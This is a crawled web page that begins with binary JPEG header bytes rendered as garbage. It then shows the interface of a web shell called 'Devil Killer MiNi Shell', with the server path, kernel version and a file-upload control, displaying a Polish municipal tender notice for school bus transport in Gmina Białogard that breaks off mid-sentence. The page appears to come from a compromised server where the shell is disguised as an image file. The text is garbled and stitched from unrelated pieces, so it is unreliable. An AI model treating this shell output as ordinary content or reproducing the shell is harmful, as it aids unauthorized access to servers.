JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211221/0032554901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Świadczenie usług w zakresie dowozu i odwozu uczniów z terenu Gminy Białogard do i z placówek oświatowych na terenie Gminy wraz ze sprawowaniem opieki nad uczniami, w 2022 roku”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BIAŁOGARD</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920469</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wileńska 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białogard</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">943124401</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">943127844</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@gmina-bialogard.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">gmina-bialogard.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Świadczenie usług w zakresie dowozu i odwozu uczniów z terenu Gminy Białogard do i z placówek oświatowych na terenie Gminy wraz ze sprawowaniem opieki nad uczniami, w 2022 roku”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6647890d-625c-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00325549</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00009639/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Świadczenie usług w zakresie dowozu i odwozu uczniów z terenu Gminy Białogard do i z placówek oświatowych w formie zakupu biletów miesięcznych w roku szkolnym 2021/2022 oraz w roku szkolnym 2022/2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym,<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/ oraz ePUAP-u dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej przetargi@gmina-bialogard.pl.<br/>2.	Wnioski, zawiadomienia oraz informacje (zwanymi dalej ogólnie „korespondencją”) Zamawiający i Wykonawcy przekazują powołując się na numer ogłoszenia (BZP) lub numer referencyjny postępowania tj. IZPiPGN.271.22.2021:<br/> a) za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez mini portal<br/> b) droga elektroniczną na adres przetargi@gmina-bialogard.pl, przy czym ten sposób komunikacji nie jest właściwy dla oferty oraz dokumentów składanych wraz z ofertą (wymagających szyfrowania), które należy składać w sposób wskazany w ppkt a)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. Urz. UE L 119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Wójt Gminy Białogard, ul. Wileńska 8, 78-200 Białogard, administrator wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail: iod@gmina-bialogard.pl <br/>2) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym na podstawie art. 275 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (tj. Dz. U. z 2021 r., poz. 1129 ze zm.) pn. &#34;Utworzenie i prowadzenie punktu selektywnego zbierania odpadów komunalnych o nazwie: Świadczenie usług w zakresie dowozu i odwozu uczniów do i z placówek oświatowych z terenu Gminy Białogard wraz ze sprawowaniem opieki nad uczniami, w formie zakupu biletów miesięcznych w roku 2022.<br/>3) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy pzp.<br/>4) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>6) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Prezes Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa;<br/>9) Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IZPiPGN.271.22.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zamawiający informuje, iż na potrzeby niniejszego postępowania przetargowego przez uczniów rozumie się uczniów szkół podstawowych, wychowanków oddziałów rocznego przygotowania przedszkolnego oraz wychowanków oddziałów przedszkolnych powyżej 5-tego roku życia. <br/>1. Przedmiotem zamówienia jest świadczenie usług w zakresie dowozu i odwozu uczniów do i z placówek oświatowych z terenu Gminy Białogard wraz ze sprawowaniem opieki nad uczniami, w formie zakupu biletów miesięcznych w 2022 roku. Dowóz uczniów do placówek odbywać się będzie w dni nauki szkolnej, w oparciu o Rozporządzenie Ministra Edukacji Narodowej z dnia 11 sierpnia 2017 r. w sprawie organizacji roku szkolnego, z wyłączeniem przerw świątecznych i ferii zimowych oraz innych dni wolnych od zajęć. <br/>Wykonawca na każdy miesiąc kalendarzowy wyda bilety miesięczne dla dzieci uprawnionych do przejazdu wg wykazu sporządzonego przez Zamawiającego.<br/>Organizacja dowozu uczniów i dzieci do szkół służy zarówno realizacji zadań własnych gminy jak i ograniczeniu indywidualnego dowozu uczniów, co ma na celu zapobieganie nadmiernej emisji CO2 do atmosfery.<br/>Ceny biletów winny uwzględniać uprawnienia dzieci do zniżek i ulg wynikających ze stosownych przepisów. <br/>Zamawiający najpóźniej do 25 każdego miesiąca w roku szkolnym przekaże Wykonawcy zapotrzebowanie na zakup biletów. <br/>Miesięczne bilety zostaną wydane Zamawiającemu w terminie do 28 każdego miesiąca <br/>w roku szkolnym (w miesiącu lutym do 26 na miesiąc marzec).<br/> 2. Dowozy uczniów do Szkół w Rogowie, Stanominie, Pomianowie z podaniem liczby uczniów z poszczególnych miejscowości <br/>a) Trasa dowozu powinna być najkrótszym odcinkiem drogi pomiędzy szkołą a daną miejscowością. <br/>b) Zamawiający zgodnie z przepisami ustawy z dnia 6 września 2001 r. o transporcie drogowym w odniesieniu do przewozów szkolnych zleca Zleceniobiorcy ustalenie elastyczne kursowania pojazdów z Dyrektorami Szkół - zgodnie z potrzebami na trasach przewidzianych na potrzeby dowozów.<br/>c) Zleceniobiorca z uwagi na konieczność sprawowania opieki nad dziećmi podczas przejazdu może ze względów bezpieczeństwa zabierać i wysadzać uczniów we wskazanych przez rodziców miejscach z uwagi na brak przystanków komunikacji publicznej - zgodnie z potrzebami na trasach przewidzianych na potrzeby dowozów.<br/>d) Pojazdy dowożące i odwożące powinny zatrzymywać się na wyznaczonych przystankach w danej miejscowości i koło niżej wymienionych szkół:<br/> 1) Szkoła Podstawowa im. Jana Brzechwy w Rogowie,<br/> 2) Szkoła Podstawowa im. Ppor. Ryszarda Kuleszy w Pomianowie,<br/> 3) Szkoła Podstawowa im. Juliana Tuwima w Stanominie. <br/>oraz w danej miejscowości (przystanki znajdują się w poszczególnych miejscowościach) <br/>w celu zabrania lub wysadzenia dzieci.<br/>e)	Wykonawca zobowiązany jest do przestrzegania ustalonego rozkładu czasowego i tras przejazdów.<br/>f) Zamawiający zastrzega sobie również możliwość uruchomienia dodatkowych kursów realizowanych w dniach zajęć szkolnych, obejmujących np. przewóz uczniów na dodatkowe zajęcia, basen itp. W tych przypadkach Wykonawca zapewnia ich dowóz<br/>na warunkach podanych w ofercie. Realizacja dodatkowych kursów będzie następowała w zależności od zapotrzebowania Zamawiającego. Zamawiający zastrzega sobie możliwość organizowania liczby dodatkowych kursów lub całkowitej rezygnacji z ich wykonywania.<br/>Ogółem dowóz z terenu gminy- 399 uczniów.<br/>e) Zamawiający wymaga aby we wszystkich w/w szkołach:<br/>	Mając na uwadze czas rozpoczynania zajęć - dzieci powinny przybyć na godz. 8:00;<br/>	Realizowane były minimum dwa odwozy dziennie. Godziny powrotu uczniów są zależne od planu lekcji i zostaną uzgodnione między Dyrektorem Szkoły a Wykonawcą. <br/>3. Wykonawca sprawował będzie opiekę nad uczniami w trakcie ich dowozu do szkół oraz w drodze powrotnej. Pod pojęciem opieka rozumie się zapewnienie warunków bezpieczeństwa i higieny w trakcie wsiadania, wysiadania i przejazdu uczniów autobusem, która jest niezbędna przy tego rodzaju przewozach.<br/>a)	Opiekunem dowożonych dzieci musi być osoba pełnoletnia, która jest w stanie utrzymać dobry kontakt z dziećmi niezbędny do zachowania bezpieczeństwa w czasie przewozu<br/>b)	Wysiadanie i wsiadanie uczniów i dzieci musi odbywać się w miejscach bezpiecznych do tego wyznaczonych i zgodnych z przepisami ruchu drogowego.<br/>c)	Do obowiązku osoby sprawującej opiekę nad uczniami będzie należało:<br/>•	sprawdzanie stanu liczbowego uczniów wewnątrz pojazdu,<br/>•	pilnowanie ładu i porządku przy wsiadaniu, zajmowaniu przez uczniów miejsc w autobusie i wysiadaniu z niego,<br/>•	ustalenie sposobu porozumiewania się z kierowcą w czasie jazdy,<br/>•	zwracanie uwagi na właściwe zachowanie się uczniów w czasie przewozu,<br/>•	zapewnienie bezpiecznego wsiadania, wysiadania z pojazdu,<br/>•	przeprowadzenie uczniów przez jezdnię do budynku szkoły, odbiór uczniów ze szkoły i odprowadzenie do autobusu;<br/>•	informowanie Zamawiającego o nieprawidłowościach w przebiegu usługi przewozu;<br/>d)	w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwu uczniów niedopuszczenie do ich przewozu.<br/>e)	Pracownicy będą wyposażeni w środek łączności - telefon komórkowy oraz identyfikatory zawierające imię i nazwisko oraz nazwę firmy realizującej dowóz.<br/>f)	Wykonawca będzie bezzwłocznie pisemnie informował Zamawiającego o wszystkich zmianach w obsadzie personalnej (kierowcy i opiekunowie), przedstawiając jednocześnie dokumenty potwierdzające wymagane przez Zamawiającego ich kwalifikacje. Zmiana ta nie powoduje konieczności sporządzania aneksu do umowy,<br/>g)	Kierowca nie może być jednocześnie opiekunem, w pojeździe musi się znajdować kierowca i opiekun.<br/>h)	Wykonawca zobowiązany jest sprawdzić w Rejestrze Sprawców Przestępstw na Tle Seksualnym, prowadzonym na podstawie ustawy z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na ile seksualnym (t.j. Dz. U. z 2016 r. poz. 152) dane zatrudnionych do opieki pracowników i przedstawić do wglądu Zamawiającemu odpowiednie potwierdzenie z rejestru, w ciągu 7 dni od wezwania Zamawiającego.<br/> i) Wykonawca zapewni najwyższy poziom usług, sprawność techniczną pojazdów, a także odpowiednie kwalifikacje oraz wysoki poziom kultury osobistej kierowców i opiekunów dzieci.<br/> j) Wykonawca oświadcza, że pracownicy Wykonawcy posiadają przeszkolenie w zakresie udzielania pierwszej pomocy i w razie potrzeby udzielą pomocy przedlekarskiej w czasie przewozu dzieci na trasie dom-szkoła-dom.<br/><br/>4. Wymagania Zamawiającego:<br/>1) W okresach jesienno - zimowych pojazdy dowożące dzieci muszą być ogrzewane, a stopnie nie mogą być śliskie i oblodzone. Szczególną uwagę należy zachować w trakcie wsiadania i wysiadania dzieci.<br/>2) Pojazdy dowożące dzieci muszą posiadać ochronę szyb bocznych przed promieniami słonecznymi dla pasażerów.<br/>3) W okresie jesienno – zimowym temperatura w pojazdach nie może być niższa niż 5 stopni Celsjusza. W okresie wiosenno – letnim, przy temperaturze powyżej 23 stopni Celsjusza w pojazdach, należy zapewnić chłodzenie (np. system wentylacji, klimatyzacja, uchylne okna)<br/>5. Dokładne oznaczenie przedziałów czasowych i przystanków w jakich powinien być wykonany dowóz uczniów do szkoły oraz ich odwiezienie po zakończeniu zajęć lekcyjnych ustalane będzie pomiędzy Wykonawcą a dyrektorami poszczególnych szkół i dostarczony oraz uzgodniony z Zamawiającym przed rozpoczęciem dowozu i odwozu . Rozkłady jazdy powinny zostać dostarczone i wywieszone przez wykonawcę poszczególnych w miejscowościach w dniu podpisania umowy.<br/>6. Oferent zobowiązany jest podać kalkulację kosztów miesięcznego dowozu jednego ucznia z danej miejscowości i z powrotem (przy uwzględnieniu ceny brutto jednego biletu miesięcznego), przy założeniach: 20 dni nauki miesięcznie.<br/>7. Dowóz uczniów będzie odbywać się pojazdami dopuszczonymi do ruchu według obowiązujących przepisów w przewozach pasażerskich i oznakowanymi właściwie do ich charakteru. <br/> W przypadku awarii wyznaczonego na zadanie pojazdu Wykonawca podstawi pojazd zastępczy spełniający właściwe wymagania techniczne w ruchu drogowym. <br/>	8. Wykonawca zapewni uczniom przewożonym warunki bezpieczeństwa, wygodę, w szczególności miejsca siedzące. Zamawiający wymaga aby Wykonawca dysponował odpowiednią liczbą pojazdów, z ilością miejsc zapewniającą dowóz wszystkich uczniów na poszczególnych trasach. <br/>9. W przypadku odpracowywania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz uczniów i dzieci zgodnie z rozkładem jazdy ustalonym przez dyrektorów poszczególnych szkół.<br/>10. Dowóz uczniów będzie odbywać się pojazdami dopuszczonymi do ruchu według obowiązujących przepisów w przewozach pasażerskich i oznakowanymi właściwie do ich charakteru. <br/>a)	Usługa dowozu uczniów i dzieci musi być realizowana autobusami spełniającymi wymagania określone w art. 17-21 Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2016 r. poz. 2022 ze zm.).<br/>Wymaga się aby autobusy były wyposażone również w:<br/> b) miejsce z przodu i z tyłu wewnątrz pojazdu przeznaczone na umieszczenie tablicy &#34;AUTOBUS SZKOLNY&#34; określonej w przepisach w sprawie rejestracji i oznaczania pojazdów,<br/> c) miejsce z przodu i z tyłu po lewej stronie pojazdu przeznaczone na umieszczenie kwadratowej tablicy (barwy żółtej) z symbolem dzieci (barwy czarnej), określonej w przepisach w sprawie rejestracji i oznaczania pojazdów, sygnał akustyczny ostrzegający na zewnątrz o cofaniu pojazdu.<br/> d) Zamawiający nie dopuszcza wykonywania usług pojazdami wyprodukowanymi przed <br/>rokiem 2000 oraz zastrzega sobie prawo doraźnych kontroli pojazdów przeprowadzanych przez Zamawiającego z możliwym udziałem Policji oraz Inspekcji Transportu Drogowego. Wykonawcy nie będą przysługiwały z tego tytułu żadne roszczenia, w tym zwrot kosztów dojazdu autobusu do stacji diagnostycznej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje skorzystanie z Prawa opcji, o którym mowa w art. 31 ust. 2 ustawy Pzp w wysokości do 30% wartości zamówienia podstawowego. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą liczbę punktów po łącznej ocenie kryteriów nr 1 i 2.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, zamawiający uzna za spełniony gdy Wykonawca posida:<br/>a)	Licencja na wykonywanie transportu drogowego osób, ważna przez cały okres wykonywania zamówienia.<br/>a)	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br/> 2) Warunek dotyczący posiadania wiedzy i doświadczenia, Zamawiający uzna za spełniony w przypadku, gdy Wykonawca wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał i zakończył, co najmniej 3 